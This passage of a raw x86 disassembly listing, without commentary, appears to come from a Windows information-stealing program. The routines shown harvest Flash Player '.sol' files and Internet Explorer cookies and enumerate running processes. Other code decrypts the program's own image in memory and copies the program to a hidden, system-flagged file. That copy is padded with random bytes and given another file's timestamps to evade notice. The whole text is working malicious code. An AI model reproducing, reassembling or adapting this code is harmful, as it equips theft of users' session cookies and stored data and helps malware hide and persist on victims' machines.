mov [ebp+var_8], eax
jz short loc_404CD0
push eax
call dword_40FD94 ; lstrlenA
mov ecx, [esi]
add ecx, eax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
push ecx
push dword ptr [eax]
call sub_40A91F
test eax, eax
pop ecx
pop ecx
jz short loc_404CFA
mov ecx, [ebp+arg_4]
push [ebp+var_10]
mov [ecx], eax
mov ecx, [esi]
push [ebp+var_8]
add ecx, eax
push ecx
call sub_409331
mov eax, [ebp+var_10]
push [ebp+var_8]
add [esi], eax
call sub_409317
add esp, 10h
jmp short loc_404CD0
; ---------------------------------------------------------------------------
loc_404CC7: ; CODE XREF: sub_404C11+5E�j
push dword ptr [ebx+4]
call dword_40FBA0
loc_404CD0: ; CODE XREF: sub_404C11+6E�j
; sub_404C11+B4�j
push edi
mov [ebp+var_C], edi
push ebx
mov dword ptr [ebx], 50h
call sub_40A94C
pop ecx
pop ecx
lea eax, [ebp+var_C]
push eax
push ebx
push [ebp+var_14]
call dword_40FB98
test eax, eax
jnz loc_404C6B
jmp short loc_404D12
; ---------------------------------------------------------------------------
loc_404CFA: ; CODE XREF: sub_404C11+8D�j
push [ebp+var_8]
mov [ebp+var_1], 0
call sub_409317
mov eax, [ebp+arg_4]
push dword ptr [eax]
call sub_409317
pop ecx
pop ecx
loc_404D12: ; CODE XREF: sub_404C11+E7�j
push [ebp+var_14]
call dword_40FB9C
loc_404D1B: ; CODE XREF: sub_404C11+54�j
push ebx
call sub_409317
cmp [ebp+arg_0], 0
pop ecx
pop edi
pop esi
pop ebx
jnz short loc_404D68
push 0
push 1Ah
lea eax, [ebp+var_21C]
push eax
push 0
call dword_40FBA8
test eax, eax
jz short loc_404D68
push offset aMacromediaFlas ; "Macromedia\\Flash Player"
lea eax, [ebp+var_21C]
push eax
push eax
call dword_40FC8C
lea eax, [ebp+var_21C]
push offset a_sol ; "*.sol"
push eax
call sub_40A28B
pop ecx
pop ecx
loc_404D68: ; CODE XREF: sub_404C11+118�j
; sub_404C11+12F�j
mov al, [ebp+var_1]
leave
retn
sub_404C11 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D6D proc near ; CODE XREF: .text:004055FA�p
var_60 = byte ptr -60h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 60h
push ebx
xor ebx, ebx
push ebx
push offset dword_401300
call sub_40A476
test eax, eax
pop ecx
pop ecx
jz short loc_404D8E
xor al, al
jmp loc_405124
; ---------------------------------------------------------------------------
loc_404D8E: ; CODE XREF: sub_404D6D+18�j
mov eax, dword_40FB34
push esi
push edi
push dword ptr [eax+138h]
push dword ptr [eax+128h]
call dword_40FD08 ; LoadLibraryA
push eax
call dword_40FD04 ; GetProcAddress
cmp eax, ebx
mov [ebp+var_18], ebx
mov [ebp+var_50], 10h
mov [ebp+var_4C], 2
mov [ebp+var_48], ebx
mov [ebp+var_44], ebx
mov [ebp+var_C], ebx
mov [ebp+var_8], ebx
jz loc_405064
push ebx
push ebx
push ebx
lea ecx, [ebp+var_18]
push ecx
call eax ; dword_40FB34
test eax, eax
jnz loc_405064
mov eax, [ebp+var_18]
cmp eax, ebx
jz loc_405064
mov ecx, [eax]
lea edx, [ebp+var_2C]
push edx
push ebx
push ebx
push eax
call dword ptr [ecx+38h]
test eax, eax
jnz loc_40505B
jmp loc_40503A
; ---------------------------------------------------------------------------
loc_404E08: ; CODE XREF: sub_404D6D+2DF�j
cmp [ebp+var_40], 0E161255Ah
jnz loc_40503A
mov eax, [ebp+var_18]
mov ecx, [eax]
lea edx, [ebp+var_28]
push edx
push ebx
lea edx, [ebp+var_40]
push edx
push ebx
push eax
call dword ptr [ecx+3Ch]
test eax, eax
jnz loc_40503A
jmp loc_405019
; ---------------------------------------------------------------------------
loc_404E35: ; CODE XREF: sub_404D6D+2BE�j
mov eax, [ebp+var_18]
mov ecx, [eax]
lea edx, [ebp+var_24]
push edx
push ebx
lea edx, [ebp+var_60]
push edx
lea edx, [ebp+var_40]
push edx
push ebx
push eax
call dword ptr [ecx+54h]
test eax, eax
jnz loc_405019
mov [ebp+var_10], ebx
mov [ebp+var_4], ebx
jmp loc_404FF8
; ---------------------------------------------------------------------------
loc_404E5F: ; CODE XREF: sub_404D6D+29D�j
mov eax, dword_40FB34
push dword ptr [eax+12Ch]
push [ebp+var_14]
call dword_40FC70
mov esi, eax
cmp esi, ebx
jz loc_404FF8
cmp [esi+16h], bx
jnz loc_404FF8
cmp esi, [ebp+var_14]
jz loc_404FF8
mov eax, [ebp+var_18]
mov ecx, [eax]
push 10h
lea edx, [ebp+var_50]
push edx
lea edx, [ebp+var_4]
push edx
lea edx, [ebp+var_10]
push edx
push [ebp+var_14]
lea edx, [ebp+var_60]
push edx
lea edx, [ebp+var_40]
push edx
push ebx
push eax
call dword ptr [ecx+44h]
test eax, eax
jnz loc_404FF8
cmp [ebp+var_10], 2
jbe loc_404FF8
push [ebp+var_10]
call sub_4092F9
mov edx, eax
cmp edx, ebx
pop ecx
mov [ebp+var_20], edx
jz loc_404FF8
mov [esi], bx
mov ecx, [ebp+var_10]
mov eax, [ebp+var_4]
add eax, ecx
xor esi, esi
xor edi, edi
cmp [eax-1], bl
jnz short loc_404F38
cmp [eax-2], bl
jnz short loc_404F38
cmp ecx, ebx
jbe short loc_404F58
loc_404EF8: ; CODE XREF: sub_404D6D+1C7�j
mov eax, [ebp+var_4]
add eax, edi
mov cl, [eax]
cmp cl, bl
jnz short loc_404F0E
cmp [eax+1], bl
jnz short loc_404F11
mov byte ptr [esi+edx], 7Ch
jmp short loc_404F2E
; ---------------------------------------------------------------------------
loc_404F0E: ; CODE XREF: sub_404D6D+194�j
cmp [eax+1], bl
loc_404F11: ; CODE XREF: sub_404D6D+199�j
jbe short loc_404F2B
push ebx
push ebx
push 1
lea ecx, [esi+edx]
push ecx
push 1
push eax
push ebx
push ebx
call dword_40FE64 ; WideCharToMultiByte
mov edx, [ebp+var_20]
jmp short loc_404F2E
; ---------------------------------------------------------------------------
loc_404F2B: ; CODE XREF: sub_404D6D:loc_404F11�j
mov [esi+edx], cl
loc_404F2E: ; CODE XREF: sub_404D6D+19F�j
; sub_404D6D+1BC�j
inc edi
inc edi
inc esi
cmp edi, [ebp+var_10]
jb short loc_404EF8
jmp short loc_404F58
; ---------------------------------------------------------------------------
loc_404F38: ; CODE XREF: sub_404D6D+180�j
; sub_404D6D+185�j
cmp ecx, ebx
jbe short loc_404F58
loc_404F3C: ; CODE XREF: sub_404D6D+1E9�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, bl
jnz short loc_404F4B
push 7Ch
pop eax
jmp short loc_404F4E
; ---------------------------------------------------------------------------
loc_404F4B: ; CODE XREF: sub_404D6D+1D7�j
movzx eax, al
loc_404F4E: ; CODE XREF: sub_404D6D+1DC�j
mov [edi+edx], al
inc edi
inc esi
cmp edi, [ebp+var_10]
jb short loc_404F3C
loc_404F58: ; CODE XREF: sub_404D6D+189�j
; sub_404D6D+1C9�j ...
cmp byte ptr [esi+edx-1], 7Ch
jnz short loc_404F60
dec esi
loc_404F60: ; CODE XREF: sub_404D6D+1F0�j
push [ebp+var_14]
call dword_40FD90 ; lstrlenW
mov ecx, [ebp+var_8]
mov [ebp+var_1C], eax
add eax, esi
lea edi, [eax+ecx]
lea eax, [edi+6]
push eax
push [ebp+var_C]
call sub_40A91F
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_4], eax
jz short loc_404FEF
push ebx
push ebx
push [ebp+var_1C]
mov [ebp+var_C], eax
add eax, [ebp+var_8]
push eax
push [ebp+var_1C]
mov [ebp+var_4], eax
push [ebp+var_14]
push ebx
push ebx
call dword_40FE64 ; WideCharToMultiByte
mov eax, [ebp+var_1C]
add [ebp+var_4], eax
mov eax, [ebp+var_4]
mov byte ptr [eax], 20h
mov eax, [ebp+var_4]
mov byte ptr [eax+1], 3Dh
mov eax, [ebp+var_4]
push esi
push [ebp+var_20]
mov byte ptr [eax+2], 20h
add [ebp+var_4], 3
push [ebp+var_4]
call sub_409331
mov eax, [ebp+var_4]
mov byte ptr [esi+eax], 0Dh
mov eax, [ebp+var_4]
mov byte ptr [esi+eax+1], 0Ah
mov eax, [ebp+var_4]
add esp, 0Ch
add edi, 5
mov [esi+eax+2], bl
mov [ebp+var_8], edi
loc_404FEF: ; CODE XREF: sub_404D6D+21A�j
push [ebp+var_20]
call sub_409317
pop ecx
loc_404FF8: ; CODE XREF: sub_404D6D+ED�j
; sub_404D6D+10A�j ...
mov eax, [ebp+var_24]
mov ecx, [eax]
push ebx
lea edx, [ebp+var_14]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jz loc_404E5F
mov eax, [ebp+var_24]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_405019: ; CODE XREF: sub_404D6D+C3�j
; sub_404D6D+E1�j
mov eax, [ebp+var_28]
mov ecx, [eax]
push ebx
lea edx, [ebp+var_60]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jz loc_404E35
mov eax, [ebp+var_28]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40503A: ; CODE XREF: sub_404D6D+96�j
; sub_404D6D+A2�j ...
mov eax, [ebp+var_2C]
mov ecx, [eax]
push ebx
lea edx, [ebp+var_40]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jz loc_404E08
mov eax, [ebp+var_2C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40505B: ; CODE XREF: sub_404D6D+90�j
mov eax, [ebp+var_18]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_405064: ; CODE XREF: sub_404D6D+60�j
; sub_404D6D+71�j ...
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_20]
push eax
push 1
mov [ebp+var_20], ebx
mov [ebp+var_1C], ebx
call sub_404C11
add esp, 0Ch
test al, al
jz short loc_4050D6
mov edi, [ebp+var_1C]
cmp edi, ebx
jbe short loc_4050D6
mov eax, [ebp+var_8]
lea eax, [edi+eax+32h]
push eax
push [ebp+var_C]
call sub_40A91F
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jz short loc_4050CD
mov eax, [ebp+var_8]
push 0Dh
add eax, esi
push offset aIeCookies ; "\nIE Cookies:\n"
push eax
mov [ebp+var_C], esi
call sub_409331
add [ebp+var_8], 0Dh
mov eax, [ebp+var_8]
push edi
push [ebp+var_20]
add esi, eax
push esi
call sub_409331
add esp, 18h
add [ebp+var_8], edi
loc_4050CD: ; CODE XREF: sub_404D6D+330�j
push [ebp+var_20]
call sub_409317
pop ecx
loc_4050D6: ; CODE XREF: sub_404D6D+311�j
; sub_404D6D+318�j
cmp [ebp+var_C], ebx
mov eax, dword_40FB34
mov ecx, [ebp+var_C]
pop edi
pop esi
jnz short loc_4050EB
mov ecx, [eax+134h]
loc_4050EB: ; CODE XREF: sub_404D6D+376�j
push ecx
mov ecx, [ebp+var_8]
add ecx, 32h
push ecx
push dword ptr [eax+130h]
push 6
call sub_40B583
push [ebp+var_C]
call sub_409317
push 4
lea eax, [ebp+var_30]
push eax
push offset dword_401300
mov [ebp+var_30], 1
call sub_40A4C3
add esp, 20h
mov al, 1
loc_405124: ; CODE XREF: sub_404D6D+1C�j
pop ebx
leave
retn
sub_404D6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405127 proc near ; CODE XREF: .text:004052B8�p
var_22C = dword ptr -22Ch
var_224 = dword ptr -224h
var_208 = byte ptr -208h
push ebp
mov ebp, esp
sub esp, 22Ch
push ebx
push edi
push 0
push 2
xor bl, bl
mov [ebp+var_22C], 22Ch
call dword_40FE14 ; CreateToolhelp32Snapshot
mov edi, eax
lea eax, [ebp+var_22C]
push eax
push edi
call dword_40FE18 ; Process32FirstW
test eax, eax
jz short loc_4051AA
push esi
loc_40515D: ; CODE XREF: sub_405127+80�j
xor esi, esi
cmp [ebp+var_224], esi
jz short loc_405197
loc_405167: ; CODE XREF: sub_405127+6A�j
mov ecx, dword_40FB34
movzx eax, si
movzx eax, ds:word_40129C[eax*2]
push dword ptr [ecx+eax*4]
lea eax, [ebp+var_208]
push eax
call dword_40FD88 ; lstrcmpiW
test eax, eax
jz short loc_405195
inc esi
cmp si, 2
jb short loc_405167
jmp short loc_405197
; ---------------------------------------------------------------------------
loc_405195: ; CODE XREF: sub_405127+63�j
mov bl, 1
loc_405197: ; CODE XREF: sub_405127+3E�j
; sub_405127+6C�j
lea eax, [ebp+var_22C]
push eax
push edi
call dword_40FE1C ; Process32NextW
test eax, eax
jnz short loc_40515D
pop esi
loc_4051AA: ; CODE XREF: sub_405127+33�j
push edi
call dword_40FDAC ; CloseHandle
pop edi
mov al, bl
pop ebx
leave
retn
sub_405127 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+14h]
mov dword_40FD08, eax
mov eax, [ebp+18h]
sub esp, 43Ch
push 61h
mov dword_40FD04, eax
call sub_40AAD4
test al, al
pop ecx
jnz short loc_4051E6
push 0
call dword ptr [ebp+0Ch]
jmp locret_405625
; ---------------------------------------------------------------------------
loc_4051E6: ; CODE XREF: .text:004051DA�j
push ebx
push esi
lea eax, [ebp-14h]
push eax
mov eax, dword_40FC1C
push 4
xor ebx, ebx
mov [ebp-14h], ebx
push dword ptr [eax+3Ch]
push eax
push dword_40FB30
call dword_40FE40 ; VirtualProtectEx
mov eax, dword_40FC1C
push 40h
pop ecx
cmp [eax+3Ch], ecx
jbe short loc_405237
loc_405215: ; CODE XREF: .text:00405235�j
cmp ecx, 2
jb short loc_405231
cmp ecx, 48h
jb short loc_405224
cmp ecx, 49h
jb short loc_405231
loc_405224: ; CODE XREF: .text:0040521D�j
lea esi, [eax+ecx]
mov al, [eax+48h]
sub [esi], al
mov eax, dword_40FC1C
loc_405231: ; CODE XREF: .text:00405218�j
; .text:00405222�j
inc ecx
cmp ecx, [eax+3Ch]
jb short loc_405215
loc_405237: ; CODE XREF: .text:00405213�j
mov [ebp-4], ebx
call dword_40FD34 ; GetCommandLineA
mov esi, eax
cmp esi, ebx
jz short loc_405292
push 0Ah
push ebx
lea eax, [ebp-10h]
push eax
push esi
call dword_40FD94 ; lstrlenA
add eax, esi
push eax
push esi
call sub_40B231
add esp, 14h
cmp eax, ebx
jbe short loc_405292
mov esi, [ebp-10h]
xor edx, edx
cmp eax, ebx
jbe short loc_405289
loc_40526D: ; CODE XREF: .text:00405287�j
mov ecx, [esi+edx*4]
cmp byte ptr [ecx], 2Dh
jnz short loc_405284
cmp byte ptr [ecx+1], 66h
jnz short loc_405284
cmp [ecx+2], bl
jnz short loc_405284
or dword ptr [ebp-4], 1
loc_405284: ; CODE XREF: .text:00405273�j
; .text:00405279�j ...
inc edx
cmp edx, eax
jb short loc_40526D
loc_405289: ; CODE XREF: .text:0040526B�j
push eax
push esi
call sub_4093AC
pop ecx
pop ecx
loc_405292: ; CODE XREF: .text:00405244�j
; .text:00405262�j
mov eax, dword_40FB34
push dword ptr [eax+34h]
push 1
push offset dword_40FD24
call dword_40FD7C ; CreateMutexW
mov [ebp-0Ch], eax
call dword_40FD78 ; RtlGetLastWin32Error
test eax, eax
jnz loc_405611
call sub_405127
mov [ebp+17h], al
mov eax, dword_40FB34
mov [ebp-8], ebx
push dword ptr [eax+30h]
mov [ebp+1Bh], bl
call sub_409588
test al, al
pop ecx
jz loc_4053A2
test byte ptr [ebp-4], 1
jnz short loc_405315
mov eax, dword_40FB34
push ebx
push ebx
push ebx
push ebx
push 1
push dword ptr [eax+30h]
call sub_4095AA
mov ecx, dword_40FC1C
add esp, 18h
cmp eax, [ecx+40h]
jb short loc_405315
push dword ptr [ebp-0Ch]
call dword_40FDAC ; CloseHandle
push ebx
call dword ptr [ebp+0Ch]
jmp loc_4053A2
; ---------------------------------------------------------------------------
loc_405315: ; CODE XREF: .text:004052E0�j
; .text:00405301�j
push ebx
push ebx
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
mov eax, dword_40FB34
mov [ebp-4], ebx
push 0Bh
push dword ptr [eax+30h]
call sub_4095AA
mov eax, dword_40FB34
add esp, 18h
cmp [ebp+17h], bl
push ebx
push ebx
push ebx
push ebx
jz short loc_405351
push 9
push dword ptr [eax+30h]
call sub_4095AA
add esp, 18h
jmp short loc_405387
; ---------------------------------------------------------------------------
loc_405351: ; CODE XREF: .text:00405340�j
push 3
push dword ptr [eax+30h]
call sub_4095AA
mov eax, dword_40FB34
push dword ptr [eax+30h]
call sub_409588
add esp, 1Ch
jmp short loc_405383
; ---------------------------------------------------------------------------
loc_40536D: ; CODE XREF: .text:00405385�j
push 14h
call dword_40FD68 ; Sleep
mov eax, dword_40FB34
push dword ptr [eax+30h]
call sub_409588
pop ecx
loc_405383: ; CODE XREF: .text:0040536B�j
test al, al
jnz short loc_40536D
loc_405387: ; CODE XREF: .text:0040534F�j
cmp [ebp-4], ebx
mov byte ptr [ebp+1Bh], 1
jz short loc_4053A2
push dword ptr [ebp-4]
call sub_409B2C
push dword ptr [ebp-4]
call sub_409317
pop ecx
pop ecx
loc_4053A2: ; CODE XREF: .text:004052D6�j
; .text:00405310�j ...
push edi
push 104h
lea eax, [ebp-43Ch]
push eax
push ebx
call dword_40FD70 ; GetModuleFileNameW
lea eax, [ebp-234h]
push eax
call sub_409D70
pop ecx
lea eax, [ebp-234h]
push eax
lea eax, [ebp-43Ch]
push eax
call dword_40FD88 ; lstrcmpiW
test eax, eax
lea eax, [ebp-234h]
push eax
jz loc_405553
call sub_409EB5
lea eax, [ebp-234h]
push eax
call sub_409B2C
pop ecx
pop ecx
push ebx
lea eax, [ebp-234h]
push eax
lea eax, [ebp-43Ch]
push eax
call dword_40FD6C ; CopyFileW
push 24h
lea eax, [ebp-234h]
push eax
call dword_40FDB4 ; SetFileAttributesW
push ebx
push ebx
push 3
push ebx
push 1
push 40000000h
lea eax, [ebp-234h]
push eax
call dword_40FDC0 ; CreateFileW
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_405542
push 2
push ebx
push ebx
push eax
call dword_40FDC8 ; SetFilePointer
test eax, eax
jz short loc_4054C2
push 400h
push 40h
call sub_409B94
pop ecx
shl eax, 9
pop ecx
mov [ebp-8], eax
jz short loc_405475
push eax
call sub_4092F9
mov edi, eax
mov eax, [ebp-8]
pop ecx
jmp short loc_405477
; ---------------------------------------------------------------------------
loc_405475: ; CODE XREF: .text:00405465�j
xor edi, edi
loc_405477: ; CODE XREF: .text:00405473�j
cmp edi, ebx
jz short loc_4054C2
xor esi, esi
cmp eax, ebx
jbe short loc_4054A2
loc_405481: ; CODE XREF: .text:004054A0�j
push 0FFh
push 1
call sub_409B94
push eax
push ebx
call sub_409B94
add esp, 10h
mov [esi+edi], al
mov eax, [ebp-8]
inc esi
cmp esi, eax
jb short loc_405481
loc_4054A2: ; CODE XREF: .text:0040547F�j
push ebx
lea ecx, [ebp-8]
push ecx
push eax
push edi
push dword ptr [ebp-4]
call dword_40FDF0 ; WriteFile
push dword ptr [ebp-4]
call dword_40FE00 ; FlushFileBuffers
push edi
call sub_409317
pop ecx
loc_4054C2: ; CODE XREF: .text:0040544F�j
; .text:00405479�j
push 1
push 25h
lea eax, [ebp-43Ch]
push eax
push ebx
call dword_40FBA8
mov eax, dword_40FB34
push dword ptr [eax+6Ch]
lea eax, [ebp-43Ch]
push eax
push eax
call dword_40FC8C
push ebx
push ebx
push 3
push ebx
push 3
push 80000000h
lea eax, [ebp-43Ch]
push eax
call dword_40FDC0 ; CreateFileW
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_405539
lea eax, [ebp-2Ch]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-24h]
push eax
push esi
call dword_40FEA8 ; GetFileTime
lea eax, [ebp-2Ch]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-24h]
push eax
push dword ptr [ebp-4]
call dword_40FEA4 ; SetFileTime
push esi
call dword_40FDAC ; CloseHandle
loc_405539: ; CODE XREF: .text:00405508�j
push dword ptr [ebp-4]
call dword_40FDAC ; CloseHandle
loc_405542: ; CODE XREF: .text:0040543C�j
push 21h
lea eax, [ebp-234h]
push eax
call dword_40FDB4 ; SetFileAttributesW
jmp short loc_40555C
; ---------------------------------------------------------------------------
loc_405553: ; CODE XREF: .text:004053E0�j
mov [ebp+17h], bl
call sub_409EB5
pop ecx
loc_40555C: ; CODE XREF: .text:00405551�j
cmp [ebp+17h], bl
jz short loc_405585
cmp [ebp+1Bh], bl
jz loc_405610
mov eax, dword_40FB34
push ebx
push ebx
push ebx
push ebx
push 0Ah
push dword ptr [eax+30h]
call sub_4095AA
add esp, 18h
jmp loc_405610
; ---------------------------------------------------------------------------
loc_405585: ; CODE XREF: .text:0040555F�j
mov eax, dword_40FC20
mov ecx, dword_40FB34
and eax, 1
or eax, 2
push dword ptr [ecx+eax*8]
call sub_40AE6F
mov edi, eax
mov esi, offset sub_4057EE
push ebx
mov eax, esi
sub eax, dword_40FCB0
push edi
push eax
call sub_406DB8
add esp, 10h
jmp short loc_4055D5
; ---------------------------------------------------------------------------
loc_4055BA: ; CODE XREF: .text:004055D7�j
push 14h
call dword_40FD68 ; Sleep
push ebx
mov eax, esi
sub eax, dword_40FCB0
push edi
push eax
call sub_406DB8
add esp, 0Ch
loc_4055D5: ; CODE XREF: .text:004055B8�j
test al, al
jz short loc_4055BA
jmp short loc_4055E3
; ---------------------------------------------------------------------------
loc_4055DB: ; CODE XREF: .text:004055F3�j
push 14h
call dword_40FD68 ; Sleep
loc_4055E3: ; CODE XREF: .text:004055D9�j
mov eax, dword_40FB34
push dword ptr [eax+2Ch]
call sub_409588
test al, al
pop ecx
jz short loc_4055DB
call sub_40B4A0
call sub_404D6D
push ebx
push ebx
push ebx
call sub_404C11
push ebx
call sub_4033BC
add esp, 10h
loc_405610: ; CODE XREF: .text:00405564�j
; .text:00405580�j
pop edi
loc_405611: ; CODE XREF: .text:004052B2�j
cmp [ebp-0Ch], ebx
jz short loc_40561F
push dword ptr [ebp-0Ch]
call dword_40FDAC ; CloseHandle
loc_40561F: ; CODE XREF: .text:00405614�j
push ebx
call dword ptr [ebp+0Ch]
pop esi
pop ebx
locret_405625: ; CODE XREF: .text:004051E1�j
leave
retn 14h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405629 proc near ; CODE XREF: sub_4056AC+B2�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
cmp [esi], ebx
jnz short loc_40566A
mov [ebp+var_1], bl
loc_405637: ; CODE XREF: sub_405629+38�j
push ebx
push ebx
push 4
push ebx
push ebx
push 80000000h
push [ebp+arg_0]
call dword_40FDC0 ; CreateFileW
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_40566A
push 14h
call dword_40FD68 ; Sleep
inc [ebp+var_1]
cmp [ebp+var_1], 14h
jb short loc_405637
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_40566A
mov [esi], ebx
loc_40566A: ; CODE XREF: sub_405629+9�j
; sub_405629+27�j ...
pop ebx
leave
retn
sub_405629 endp
; =============== S U B R O U T I N E =======================================
sub_40566D proc near ; CODE XREF: sub_4056AC+C9�p
mov eax, [esi]
test eax, eax
jz short locret_40567D
push eax
call dword_40FDAC ; CloseHandle
and dword ptr [esi], 0
locret_40567D: ; CODE XREF: sub_40566D+4�j
retn
sub_40566D endp
; =============== S U B R O U T I N E =======================================
sub_40567E proc near ; CODE XREF: sub_4056AC+FD�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_40FD90 ; lstrlenW
lea eax, [eax+eax+2]
mov [esi], eax
push dword ptr [edi]
call sub_409317
push dword ptr [esi]
push [esp+8+arg_0]
call sub_40936D
add esp, 0Ch
test eax, eax
mov [edi], eax
jnz short locret_4056AB
and [esi], eax
locret_4056AB: ; CODE XREF: sub_40567E+29�j
retn
sub_40567E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4056AC proc near ; DATA XREF: sub_4057EE+A0�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
cmp eax, 1
push esi
push edi
jnz short loc_4056C9
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
mov eax, dword_40FC1C
mov eax, [eax+40h]
jmp short loc_4056F7
; ---------------------------------------------------------------------------
loc_4056C9: ; CODE XREF: sub_4056AC+B�j
cmp eax, 2
jnz short loc_4056DE
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
mov eax, dword_40FC1C
mov eax, [eax+44h]
jmp short loc_4056F7
; ---------------------------------------------------------------------------
loc_4056DE: ; CODE XREF: sub_4056AC+20�j
cmp eax, 3
jnz short loc_4056FB
push dword_40F868
call dword_40FDBC ; SetEvent
loc_4056EF: ; CODE XREF: sub_4056AC+10B�j
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
loc_4056F5: ; CODE XREF: sub_4056AC+CE�j
; sub_4056AC+103�j
xor eax, eax
loc_4056F7: ; CODE XREF: sub_4056AC+1B�j
; sub_4056AC+30�j ...
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4056FB: ; CODE XREF: sub_4056AC+35�j
cmp eax, 4
jnz short loc_40570D
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
mov eax, dword_40FCA4
jmp short loc_4056F7
; ---------------------------------------------------------------------------
loc_40570D: ; CODE XREF: sub_4056AC+52�j
cmp eax, 5
jnz short loc_40571F
push dword_40F860
mov esi, offset dword_40F86C
jmp short loc_405758
; ---------------------------------------------------------------------------
loc_40571F: ; CODE XREF: sub_4056AC+64�j
cmp eax, 6
jnz short loc_40572B
mov esi, offset dword_40F86C
jmp short loc_40576F
; ---------------------------------------------------------------------------
loc_40572B: ; CODE XREF: sub_4056AC+76�j
cmp eax, 7
jnz short loc_40573D
push dword_40F864
mov esi, offset dword_40FA7C
jmp short loc_405758
; ---------------------------------------------------------------------------
loc_40573D: ; CODE XREF: sub_4056AC+82�j
cmp eax, 8
jnz short loc_405749
mov esi, offset dword_40FA7C
jmp short loc_40576F
; ---------------------------------------------------------------------------
loc_405749: ; CODE XREF: sub_4056AC+94�j
cmp eax, 0Ah
jnz short loc_405765
push offset dword_40F870
mov esi, offset dword_40FA78
loc_405758: ; CODE XREF: sub_4056AC+71�j
; sub_4056AC+8F�j
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
call sub_405629
jmp short loc_4057AE
; ---------------------------------------------------------------------------
loc_405765: ; CODE XREF: sub_4056AC+A0�j
cmp eax, 9
jnz short loc_40577F
mov esi, offset dword_40FA78
loc_40576F: ; CODE XREF: sub_4056AC+7D�j
; sub_4056AC+9B�j
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
call sub_40566D
jmp loc_4056F5
; ---------------------------------------------------------------------------
loc_40577F: ; CODE XREF: sub_4056AC+BC�j
cmp eax, 0Bh
jnz short loc_40578B
push offset dword_40F870
jmp short loc_4057A3
; ---------------------------------------------------------------------------
loc_40578B: ; CODE XREF: sub_4056AC+D6�j
cmp eax, 0Ch
jnz short loc_405798
push dword_40F860
jmp short loc_4057A3
; ---------------------------------------------------------------------------
loc_405798: ; CODE XREF: sub_4056AC+E2�j
cmp eax, 0Dh
jnz short loc_4057B4
push dword_40F864
loc_4057A3: ; CODE XREF: sub_4056AC+DD�j
; sub_4056AC+EA�j
mov esi, [ebp+arg_8]
mov edi, [ebp+arg_4]
call sub_40567E
loc_4057AE: ; CODE XREF: sub_4056AC+B7�j
pop ecx
jmp loc_4056F5
; ---------------------------------------------------------------------------
loc_4057B4: ; CODE XREF: sub_4056AC+EF�j
cmp eax, 0Eh
jnz loc_4056EF
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
mov eax, dword_40FB34
push dword ptr [eax+78h]
push dword_40FD30
call dword_40FD04 ; GetProcAddress
test eax, eax
jz short loc_4057E2
push 8007h
call eax ; dword_40FB34
loc_4057E2: ; CODE XREF: sub_4056AC+12D�j
xor eax, eax
mov [eax], eax
xor eax, eax
loc_4057E8: ; CODE XREF: sub_4056AC+140�j
mov byte ptr [eax], 0
inc eax
jmp short loc_4057E8
sub_4056AC endp
; =============== S U B R O U T I N E =======================================
sub_4057EE proc near ; DATA XREF: .text:004055A0�o
; .data:00416AC6�o
var_14 = dword ptr -14h
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
push 1
call sub_40AAD4
pop ecx
xor esi, esi
push esi
push esi
push 1
push esi
call dword_40FDC4 ; CreateEventW
mov ebx, offset dword_40F870
push ebx
mov dword_40F868, eax
call sub_409D70
pop ecx
push esi
push esi
push 3
push esi
push esi
mov edi, 80000000h
push edi
push ebx
call dword_40FDC0 ; CreateFileW
mov dword_40FA78, eax
call sub_409E6A
call sub_4034A0
push esi
push esi
push 4
push esi
push esi
push edi
push eax
mov dword_40F860, eax
call dword_40FDC0 ; CreateFileW
cmp eax, 0FFFFFFFFh
mov dword_40F86C, eax
jnz short loc_40585E
mov dword_40F86C, esi
loc_40585E: ; CODE XREF: sub_4057EE+68�j
call sub_40B4A0
push esi
push esi
push 4
push esi
push esi
push edi
